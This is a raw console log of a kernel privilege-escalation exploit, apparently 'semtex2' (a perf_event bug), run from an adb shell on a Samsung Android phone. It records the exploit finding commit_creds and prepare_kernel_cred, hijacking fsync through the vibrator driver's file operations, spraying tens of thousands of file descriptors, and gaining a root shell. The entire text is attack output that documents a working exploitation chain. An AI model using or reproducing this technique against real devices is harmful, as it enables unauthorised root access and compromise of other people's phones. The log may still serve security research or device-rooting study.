- shell@android:/ $ id
- uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
- shell@android:/ $ /data/local/tmp/bin/uname -a
- Linux localhost 3.0.8-perf-I717UCLF6-CL773414 #1 SMP PREEMPT Sat Jun 23 20:21:19 KST 2012 armv7l GNU/Linux
- shell@android:/ $ /data/local/tmp/semtex2 "sh -i"
- main() located @ 0x8fb8, END() @ 0x979c: 2020 bytes (0x7e4)
- commit_creds() @ 0xc01ccf78
- prepare_kernel_cred() @ 0xc01cd670
- no ptmx_fops symbol for hi-jacking fsync()
- using Samsung's vibrator kernel module fops
- Vibetonz_fops @ 0xbf000fc0
- fsync @ 0xbf000ff8
- no perf_swevent_enabled symbol. try finding it manually
- mmap memory region: 0x10000000 - 0x12000000
- clearing mmap region to detect perf_event exploit
- kernel base assumed at: 0xc0000000
- memory gap size: 1342177280 (0x50000000)
- target perf_swevent_enabled index: 0x14000000 (335544320)
- searching for change in mmap region...
- found change at addr: 0x1118fcc8 (1 - '')
- cleaning up perf_event_open file-descriptors
- perf_swevent_enabled is at: 0xc118fcc8
- # bytes from perf_swevent_enabled to reach fsync(): 0xfde71330 (-35187920)
- number of words being added to perf_swevent_enabled offset: 0x3f79c4cc (1064944844)
- 45056 FD's needed using 88 child processes (512 fd's/pid)
- sleeping to let the children catch up...
- mapping memory for exploit code at: 0xb000 - 0xc000
- opening /dev/tspdrv
- triggering file_ops.fsync()!
- shell@android:/ # id
- uid=0(root) gid=0(root)
- shell@android:/ # exit
- attempting to reap child proccesses...
- children killed... hopefully the kernel won't panic() :)